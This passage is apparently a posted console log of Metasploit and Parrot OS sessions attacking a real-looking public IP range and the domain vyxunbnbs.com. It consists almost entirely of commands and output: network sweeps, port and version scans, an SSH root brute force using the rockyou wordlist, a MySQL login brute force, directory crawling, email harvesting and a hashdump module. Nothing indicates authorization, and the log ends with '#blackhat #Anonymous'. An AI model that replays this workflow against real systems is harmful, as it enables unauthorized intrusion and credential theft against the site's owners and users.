2016. ========
2017.  
2018. host port proto name state info
2019. ---- ---- ----- ---- ----- ----
2020.  
2021.  
2022. CSV Export
2023.  
2024. msf > services -s http -c port 198.71.232.3 -o /root/Desktop/http.csv
2025.  
2026. [*] Wrote services to /root/Desktop/http.csv
2027.  
2028. msf > services -s https -c port 198.71.232.3 -o /root/Desktop/https.csv
2029.  
2030. [*] Wrote services to /root/Desktop/https.csv
2031.  
2032. msf > hosts -S Linux -o /root/Desktop/linux.csv
2033. [*] Wrote hosts to /root/Desktop/linux.csv
2034.  
2035. msf > cat /root/Desktop/http.csv
2036. [*] exec: cat /root/Desktop/http.csv
2037.  
2038. host,port
2039. "198.71.232.3","80"
2040.  
2041. msf > cat /root/Desktop/https.csv
2042. [*] exec: cat /root/Desktop/https.csv
2043.  
2044. host,port
2045. "198.71.232.3","443"
2046.  
2047. msf > cat /root/Desktop/linux.csv
2048. [*] exec: cat /root/Desktop/linux.csv
2049.  
2050. address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments
2051.  
2052. RELOAD ALL METASPLOIT MODULES
2053.  
2054. msf > reload_all
2055. [*] Reloading modules from all module paths...
2056.  
2057. ______________________________________________________________________________
2058. | |
2059. | METASPLOIT CYBER MISSILE COMMAND V4 |
2060. |______________________________________________________________________________|
2061. \ / /
2062. \ . / / x
2063. \ / /
2064. \ / + /
2065. \ + / /
2066. * / /
2067. / . /
2068. X / / X
2069. / ###
2070. / # % #
2071. / ###
2072. . /
2073. . / . * .
2074. /
2075. *
2076. + *
2077.  
2078. ^
2079. #### __ __ __ ####### __ __ __ ####
2080. #### / \ / \ / \ ########### / \ / \ / \ ####
2081. ################################################################################
2082. ################################################################################
2083. # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
2084. ################################################################################
2085. http://metasploit.pro
2086.  
2087.  
2088. Easy phishing: Set up email templates, landing pages and listeners
2089. in Metasploit Pro -- learn more on http://rapid7.com/metasploit
2090.  
2091. =[ metasploit v4.11.5-2016010401 ]
2092. + -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
2093. + -- --=[ 437 payloads - 37 encoders - 8 nops ]
2094. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
2095.  
2096.  
2097. USE ARP_SWEEP
2098.  
2099. msf > use auxiliary/scanner/discovery/arp_sweep
2100. msf auxiliary(arp_sweep) > show options
2101.  
2102. Module options (auxiliary/scanner/discovery/arp_sweep):
2103.  
2104. Name Current Setting Required Description
2105. ---- --------------- -------- -----------
2106. INTERFACE no The name of the interface
2107. RHOSTS yes The target address range or CIDR identifier
2108. SHOST no Source IP Address
2109. SMAC no Source MAC Address
2110. THREADS 1 yes The number of concurrent threads
2111. TIMEOUT 5 yes The number of seconds to wait for new data
2112.  
2113. msf auxiliary(arp_sweep) > set RHOSTS 198.71.232.3/24
2114. RHOSTS => 198.71.232.3/24
2115. msf auxiliary(arp_sweep) > set THREADS 50
2116. THREADS => 50
2117. msf auxiliary(arp_sweep) > run
2118.  
2119. [*] Scanned 256 of 256 hosts (100% complete)
2120. [*] Auxiliary module execution completed
2121.  
2122.  
2123. msf auxiliary(arp_sweep) > back
2124.  
2125. USE NMAP
2126.  
2127. msf > nmap -sn 198.71.232.3/24
2128. [*] exec: nmap -sn 198.71.232.3/24
2129.  
2130.  
2131. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:31 CEST
2132. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
2133. Nmap scan report for 198.71.232.0
2134. Host is up (0.11s latency).
2135. Nmap scan report for 198.71.232.1
2136. Host is up (0.11s latency).
2137. Nmap scan report for 198.71.232.2
2138. Host is up (0.11s latency).
2139. Nmap scan report for 198.71.232.3
2140. Host is up (0.11s latency).
2141. Nmap scan report for 198.71.232.4
2142. Host is up (0.11s latency).
2143. Nmap scan report for 198.71.232.5
2144. Host is up (0.11s latency).
2145. Nmap scan report for 198.71.232.6
2146. Host is up (0.11s latency).
2147. Nmap scan report for 198.71.232.7
2148. Host is up (0.11s latency).
2149. Nmap scan report for 198.71.232.8
2150. Host is up (0.11s latency).
2151. Nmap scan report for 198.71.232.9
2152. Host is up (0.11s latency).
2153. Nmap done: 256 IP addresses (10 hosts up) scanned in 5.25 seconds
2154.  
2155.  
2156. msf > nmap -PU -sn 198.71.232.3/24
2157. [*] exec: nmap -PU -sn 198.71.232.3/24
2158.  
2159.  
2160. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:33 CEST
2161. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
2162. Nmap done: 256 IP addresses (0 hosts up) scanned in 52.11 seconds
2163.  
2164.  
2165. msf > nmap -O 198.71.232.3
2166. [*] exec: nmap -O 198.71.232.3
2167.  
2168.  
2169. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:34 CEST
2170. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
2171. Nmap scan report for 198.71.232.3
2172. Host is up (0.11s latency).
2173. Not shown: 998 filtered ports
2174. PORT STATE SERVICE
2175. 80/tcp open http
2176. 443/tcp open https
2177. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2178. OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
2179. No OS matches for host
2180.  
2181. OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2182. Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds
2183.  
2184.  
2185. SEARCH PORTSCAN
2186.  
2187. msf > search portscan
2188.  
2189. Matching Modules
2190. ================
2191.  
2192. Name Disclosure Date Rank Description
2193. ---- --------------- ---- -----------
2194. auxiliary/scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
2195. auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
2196. auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
2197. auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
2198. auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
2199. auxiliary/scanner/portscan/tcp normal TCP Port Scanner
2200. auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
2201. auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
2202.  
2203. USE PORTSCAN
2204.  
2205. msf > use auxiliary/scanner/portscan/syn
2206.  
2207. msf auxiliary(syn) > set RHOSTS 198.71.232.3
2208.  
2209. RHOSTS => 198.71.232.3
2210.  
2211. msf auxiliary(syn) > set THREADS 200
2212.  
2213. THREADS => 200
2214.  
2215. msf auxiliary(syn) > run
2216.  
2217. [*] TCP OPEN 198.71.232.3:80
2218. [*] TCP OPEN 198.71.232.3:443
2219.  
2220. SEARCH NAME_VERSION
2221.  
2222. msf > search name:_version
2223.  
2224. USE TELNET AUXILIARY SCANNER
2225.  
2226. msf > use auxiliary/scanner/telnet/telnet_version
2227. msf auxiliary(telnet_version) > set RHOSTS 198.71.232.3/24
2228. RHOSTS => 198.71.232.3
2229. msf auxiliary(telnet_version) > set THREADS 100
2230. THREADS => 100
2231. msf auxiliary(telnet_version) > run
2232.  
2233. [*] Scanned 41 of 256 hosts (16% complete)
2234. [*] Scanned 93 of 256 hosts (36% complete)
2235. [*] Scanned 96 of 256 hosts (37% complete)
2236. [*] Scanned 130 of 256 hosts (50% complete)
2237. [*] Scanned 131 of 256 hosts (51% complete)
2238. [*] Scanned 192 of 256 hosts (75% complete)
2239. [*] Scanned 193 of 256 hosts (75% complete)
2240. [*] Scanned 211 of 256 hosts (82% complete)
2241. [*] Scanned 241 of 256 hosts (94% complete)
2242. [*] Scanned 256 of 256 hosts (100% complete)
2243. [*] Auxiliary module execution completed
2244. msf auxiliary(telnet_version) >
2245.  
2246.  
2247. USE AUXILIARY SSH_VERSION
2248.  
2249. msf auxiliary(telnet_version) > use auxiliary/scanner/ssh/ssh_version
2250. msf auxiliary(ssh_version) > show options
2251.  
2252. Module options (auxiliary/scanner/ssh/ssh_version):
2253.  
2254. Name Current Setting Required Description
2255. ---- --------------- -------- -----------
2256. RHOSTS yes The target address range or CIDR identifier
2257. RPORT 22 yes The target port
2258. THREADS 1 yes The number of concurrent threads
2259. TIMEOUT 30 yes Timeout for the SSH probe
2260.  
2261. msf auxiliary(ssh_version) > set RHOSTS 198.71.232.3/24
2262. RHOSTS => 198.71.232.3/24
2263. msf auxiliary(ssh_version) > set THREADS 200
2264. THREADS => 200
2265. msf auxiliary(ssh_version) > run
2266.  
2267. [*] 198.71.232.7:22 SSH server version: SSH-2.0-OpenSSH_6.3 ( service.version=6.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH )
2268. [*] Scanned 42 of 256 hosts (16% complete)
2269. [*] Scanned 77 of 256 hosts (30% complete)
2270. [*] Scanned 119 of 256 hosts (46% complete)
2271. [*] Scanned 136 of 256 hosts (53% complete)
2272. [*] Scanned 137 of 256 hosts (53% complete)
2273. [*] Scanned 156 of 256 hosts (60% complete)
2274. [*] Scanned 187 of 256 hosts (73% complete)
2275. [*] Scanned 253 of 256 hosts (98% complete)
2276. [*] Scanned 255 of 256 hosts (99% complete)
2277. [*] Scanned 256 of 256 hosts (100% complete)
2278. [*] Auxiliary module execution completed
2279.  
2280.  
2281. USE ORACLE SCANNER
2282.  
2283. msf auxiliary(tnslsnr_version) > show options
2284.  
2285. Module options (auxiliary/scanner/oracle/tnslsnr_version):
2286.  
2287. Name Current Setting Required Description
2288. ---- --------------- -------- -----------
2289. RHOSTS yes The target address range or CIDR identifier
2290. RPORT 1521 yes The target port
2291. THREADS 1 yes The number of concurrent threads
2292.  
2293. msf auxiliary(tnslsnr_version) > set RHOSTS 198.71.232.3/24
2294. RHOSTS => 198.71.232.3/24
2295. msf auxiliary(tnslsnr_version) > set THREADS 200
2296. THREADS => 200
2297. msf auxiliary(tnslsnr_version) > run
2298.  
2299. [*] Scanned 105 of 256 hosts (41% complete)
2300. [*] Scanned 113 of 256 hosts (44% complete)
2301. [*] Scanned 131 of 256 hosts (51% complete)
2302. [*] Scanned 188 of 256 hosts (73% complete)
2303. [*] Scanned 200 of 256 hosts (78% complete)
2304. [*] Scanned 237 of 256 hosts (92% complete)
2305. [*] Scanned 243 of 256 hosts (94% complete)
2306. [*] Scanned 250 of 256 hosts (97% complete)
2307. [*] Scanned 252 of 256 hosts (98% complete)
2308. [*] Scanned 256 of 256 hosts (100% complete)
2309. [*] Auxiliary module execution completed
2310.  
2311.  
2312. USE OPEN_PROXY
2313.  
2314. msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy
2315.  
2316. msf auxiliary(open_proxy) > show options
2317.  
2318. msf auxiliary(open_proxy) > show options
2319.  
2320. Module options (auxiliary/scanner/http/open_proxy):
2321.  
2322. Name Current Setting Required Description
2323. ---- --------------- -------- -----------
2324. LOOKUP_PUBLIC_ADDRESS false no Enable test for retrieve public IP address via RIPE.net
2325. MULTIPORTS false no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
2326. RANDOMIZE_PORTS false no Randomize the order the ports are probed
2327. RHOSTS yes The target address range or CIDR identifier
2328. RPORT 8080 yes The target port
2329. SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
2330. THREADS 1 yes The number of concurrent threads
2331. UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
2332. VERIFY_CONNECT false no Enable test for CONNECT method
2333. VERIFY_HEAD false no Enable test for HEAD method
2334. ValidCode 200,302 no Valid HTTP code for a successfully request
2335. ValidPattern server: gws no Valid HTTP server header for a successfully request
2336.  
2337. msf auxiliary(open_proxy) > set LOOKUP_PUBLIC_ADDRESS true
2338. LOOKUP_PUBLIC_ADDRESS => true
2339. msf auxiliary(open_proxy) > set MULTIPORTS true
2340. MULTIPORTS => true
2341. msf auxiliary(open_proxy) > show options
2342.  
2343. Module options (auxiliary/scanner/http/open_proxy):
2344.  
2345. Name Current Setting Required Description
2346. ---- --------------- -------- -----------
2347. LOOKUP_PUBLIC_ADDRESS true no Enable test for retrieve public IP address via RIPE.net
2348. MULTIPORTS true no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
2349. RANDOMIZE_PORTS false no Randomize the order the ports are probed
2350. RHOSTS yes The target address range or CIDR identifier
2351. RPORT 8080 yes The target port
2352. SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
2353. THREADS 1 yes The number of concurrent threads
2354. UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
2355. VERIFY_CONNECT false no Enable test for CONNECT method
2356. VERIFY_HEAD false no Enable test for HEAD method
2357. ValidCode 200,302 no Valid HTTP code for a successfully request
2358. ValidPattern server: gws no Valid HTTP server header for a successfully request
2359.  
2360. msf auxiliary(open_proxy) > set RANDOMIZE_PORTS true
2361. RANDOMIZE_PORTS => true
2362. msf auxiliary(open_proxy) > set RHOSTS 198.71.232.3
2363. RHOSTS => 198.71.232.3
2364. msf auxiliary(open_proxy) > set RPORT 8080
2365. RPORT => 8080
2366. msf auxiliary(open_proxy) > run
2367.  
2368. [*] Scanned 1 of 1 hosts (100% complete)
2369. [*] Auxiliary module execution completed
2370. msf auxiliary(open_proxy) >
2371.  
2372.  
2373. USE SSH_LOGIN
2374.  
2375. msf auxiliary(open_proxy) > use auxiliary/scanner/ssh/ssh_login
2376. msf auxiliary(ssh_login) > set RHOSTS 198.71.232.3
2377. RHOSTS => 198.71.232.3
2378. msf auxiliary(ssh_login) > set USERNAME root
2379. USERNAME => root
2380. msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/rockyou.txt
2381. PASS_FILE => /root/Desktop/rockyou.txt
2382. msf auxiliary(ssh_login) > set THREADS 2000
2383. THREADS => 2000
2384. msf auxiliary(ssh_login) > run
2385.  
2386. [*] 198.71.232.3:22 SSH - Starting bruteforce
2387. [-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
2388. [-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
2389. [-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
2390. [*] Scanned 1 of 1 hosts (100% complete)
2391. [*] Auxiliary module execution completed
2392.  
2393.  
2394. USE AUXILIARY DIR_SCANNER
2395.  
2396. msf auxiliary(ssh_login) > use auxiliary/scanner/http/dir_scanner
2397. msf auxiliary(dir_scanner) > set THREADS 50
2398. THREADS => 50
2399. msf auxiliary(dir_scanner) > set RHOSTS 198.71.232.3
2400. RHOSTS => 198.71.232.3
2401. msf auxiliary(dir_scanner) > exploit
2402.  
2403. [*] Detecting error code
2404. [*] Using code '404' as not found for 198.71.232.3
2405. [*] Scanned 1 of 1 hosts (100% complete)
2406. [*] Auxiliary module execution completed
2407. msf auxiliary(dir_scanner) > set RHOSTS www.vyxunbnbs.com
2408. RHOSTS => www.vyxunbnbs.com
2409. msf auxiliary(dir_scanner) > exploit
2410.  
2411. [*] Detecting error code
2412. [*] Using code '404' as not found for 198.71.232.3
2413. [*] Scanned 1 of 1 hosts (100% complete)
2414. [*] Auxiliary module execution completed
2415. msf auxiliary(dir_scanner) > set RHOSTS vyxunbnbs.com
2416. RHOSTS => vyxunbnbs.com
2417. msf auxiliary(dir_scanner) > exploit
2418.  
2419. [*] Detecting error code
2420. [*] Using code '404' as not found for 198.71.232.3
2421. [*] Scanned 1 of 1 hosts (100% complete)
2422. [*] Auxiliary module execution completed
2423. msf auxiliary(dir_scanner) >
2424.  
2425.  
2426. USE EMAIL_COLLECTOR
2427.  
2428. msf auxiliary(dir_scanner) > use auxiliary/gather/search_email_collector
2429.  
2430. msf auxiliary(search_email_collector) > set DOMAIN vyxunbnbs.com
2431.  
2432. DOMAIN => vyxunbnbs.com
2433.  
2434. msf auxiliary(search_email_collector) > run
2435.  
2436. [*] Harvesting emails .....
2437. [*] Searching Google for email addresses from vyxunbnbs.com
2438. [*] Extracting emails from Google search results...
2439. [*] Searching Bing email addresses from vyxunbnbs.com
2440. [*] Extracting emails from Bing search results...
2441. [*] Searching Yahoo for email addresses from vyxunbnbs.com
2442. [*] Extracting emails from Yahoo search results...
2443. [*] Located 0 email addresses for vyxunbnbs.com
2444. [*] Auxiliary module execution completed
2445.  
2446.  
2447. msf auxiliary(search_email_collector) > use auxiliary/scanner/mysql/mysql_login
2448. msf auxiliary(mysql_login) > show options
2449.  
2450. Module options (auxiliary/scanner/mysql/mysql_login):
2451.  
2452. Name Current Setting Required Description
2453. ---- --------------- -------- -----------
2454. BLANK_PASSWORDS false no Try blank passwords for all users
2455. BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
2456. DB_ALL_CREDS false no Try each user/password couple stored in the current database
2457. DB_ALL_PASS false no Add all passwords in the current database to the list
2458. DB_ALL_USERS false no Add all users in the current database to the list
2459. PASSWORD no A specific password to authenticate with
2460. PASS_FILE no File containing passwords, one per line
2461. Proxies no A proxy chain of format type:host:port[,type:host:port][...]
2462. RHOSTS yes The target address range or CIDR identifier
2463. RPORT 3306 yes The target port
2464. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
2465. THREADS 1 yes The number of concurrent threads
2466. USERNAME no A specific username to authenticate as
2467. USERPASS_FILE no File containing users and passwords separated by space, one pair per line
2468. USER_AS_PASS false no Try the username as the password for all users
2469. USER_FILE no File containing usernames, one per line
2470. VERBOSE true yes Whether to print output for all attempts
2471.  
2472. msf auxiliary(mysql_login) > set RHOSTS vyxunbnbs.com
2473. RHOSTS => vyxunbnbs.com
2474. msf auxiliary(mysql_login) > run
2475.  
2476. [-] 198.71.232.3:3306 MYSQL - Unable to connect: The connection timed out (198.71.232.3:3306).
2477. [*] Scanned 1 of 1 hosts (100% complete)
2478. [*] Auxiliary module execution completed
2479. msf auxiliary(mysql_login) >
2480.  
2481. msf auxiliary(mysql_login) > creds
2482.  
2483. msf auxiliary(mysql_login) > sessions -l
2484.  
2485. Active sessions
2486. ===============
2487.  
2488. No active sessions.
2489.  
2490.  
2491. USE LOOT
2492.  
2493. msf > loot -h
2494.  
2495. Usage: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
2496.  
2497. -t <type1,type2> Search for a list of types
2498. -h,--help Show this help information
2499. -S,--search Search string to filter by
2500.  
2501. Here’s an example of how one would populate the database with some ‘loot’.
2502.  
2503. msf exploit(usermap_script) > use post/linux/gather/hashdump
2504. msf post(hashdump) > show options
2505.  
2506. msf post(hashdump) > loot
2507.  
2508. Loot
2509. ====
2510.  
2511. host service type name content info path
2512. ---- ------- ---- ---- ------- ---- ----
2513.  
2514. USE AUXILIARY SCANNER HTTP CRAWLER
2515.  
2516. msf post(hashdump) > use auxiliary/scanner/http/crawler
2517. msf auxiliary(crawler) > set RHOST vyxunbnbs.com
2518. RHOST => vyxunbnbs.com
2519. msf auxiliary(crawler) > run
2520.  
2521. [*] Crawling http://vyxunbnbs.com:80/...
2522. [*] [00001/00500] 301 - vyxunbnbs.com - http://vyxunbnbs.com/ -> http://www.vyxunbnbs.com/
2523. [*] Crawl of http://vyxunbnbs.com:80/ complete
2524. [*] Auxiliary module execution completed
2525.  
2526. msf auxiliary(crawler) >
2527.  
2528. [*] Done.
2529.  
2530. CHECK THE SITE WITH PARSERO
2531.  
2532. ┌─[root@parrot]─[~]
2533. └──╼ #parsero -u www.vyxunbnbs.com
2534.  
2535. ____
2536. | _ \ __ _ _ __ ___ ___ _ __ ___
2537. | |_) / _` | '__/ __|/ _ \ '__/ _ \
2538. | __/ (_| | | \__ \ __/ | | (_) |
2539. |_| \__,_|_| |___/\___|_| \___/
2540.  
2541. Starting Parsero v0.75 (https://github.com/behindthefirewalls/Parsero) at 05/29/16 19:59:04
2542. Parsero scan report for www.vyxunbnbs.com
2543. http://www.vyxunbnbs.com/images/ 404 Not Found
2544. http://www.vyxunbnbs.com/_temp/ 404 Not Found
2545. http://www.vyxunbnbs.com/statshistory/ 404 Not Found
2546. http://www.vyxunbnbs.com/_backup/ 404 Not Found
2547. http://www.vyxunbnbs.com/Flash/ 404 Not Found
2548. http://www.vyxunbnbs.com/stats/ 404 Not Found
2549. http://www.vyxunbnbs.com/plugins/ 404 Not Found
2550. http://www.vyxunbnbs.com/_mygallery/ 404 Not Found
2551. http://www.vyxunbnbs.com/_tempalbums/ 404 Not Found
2552. http://www.vyxunbnbs.com/dbboon/ 404 Not Found
2553. http://www.vyxunbnbs.com/cache/ 404 Not Found
2554. http://www.vyxunbnbs.com/scripts/ 404 Not Found
2555. http://www.vyxunbnbs.com/mobile/ 200 OK
2556. http://www.vyxunbnbs.com/_tmpfileop/ 404 Not Found
2557. http://www.vyxunbnbs.com/QSC/ 404 Not Found
2558.  
2559. [+] 15 links have been analyzed and 1 of them are available!!!
2560.  
2561. Finished in 2.3001761436462402 seconds
2562.  
2563.  
2564. http://www.vyxunbnbs.com/mobile/ 200 OK
2565.  
2566.  
2567. CHECK THE SITE WITH WPSCAN
2568.  
2569. ┌─[root@parrot]─[~]
2570. └──╼ #wpscan --url www.vyxunbnbs.com/mobile --enumerate u
2571. _______________________________________________________________
2572. __ _______ _____
2573. \ \ / / __ \ / ____|
2574. \ \ /\ / /| |__) | (___ ___ __ _ _ __
2575. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
2576. \ /\ / | | ____) | (__| (_| | | | |
2577. \/ \/ |_| |_____/ \___|\__,_|_| |_|
2578.  
2579. WordPress Security Scanner by the WPScan Team
2580. Version 2.9
2581. Sponsored by Sucuri - https://sucuri.net
2582. @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
2583. _______________________________________________________________
2584.  
2585.  
2586. [!] The remote website is up, but does not seem to be running WordPress.
2587.  
2588. COLLECT ALL THE EMAIL WITH THEHARVESTER
2589.  
2590. ┌─[root@parrot]─[~]
2591. └──╼ #theharvester -d vyxunbnbs.com -b all -n -c -t -l 50 -h
2592.  
2593. *******************************************************************
2594. * *
2595. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
2596. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
2597. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
2598. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
2599. * *
2600. * TheHarvester Ver. 2.7 *
2601. * Coded by Christian Martorella *
2602. * Edge-Security Research *
2603. * cmartorella@edge-security.com *
2604. *******************************************************************
2605.  
2606.  
2607. Full harvest..
2608. [-] Searching in Google..
2609. Searching 0 results...
2610. [-] Searching in PGP Key server..
2611. [-] Searching in Bing..
2612. Searching 50 results...
2613. [-] Searching in Exalead..
2614. Searching 50 results...
2615. Searching 100 results...
2616.  
2617.  
2618. [+] Emails found:
2619. ------------------
2620. pixel-146454504959172-web-@vyxunbnbs.com
2621.  
2622. [+] Hosts found in search engines:
2623. ------------------------------------
2624. [-] Resolving hostnames IPs...
2625. 198.71.232.3:www.vyxunbnbs.com
2626.  
2627. [+] Starting active queries:
2628. [-]Performing reverse lookup in :198.71.232.0/24
2629. Error in DNS resolvers
2630.  
2631. DONE
2632.  
2633. #blackhat #Anonymous #GLOBAL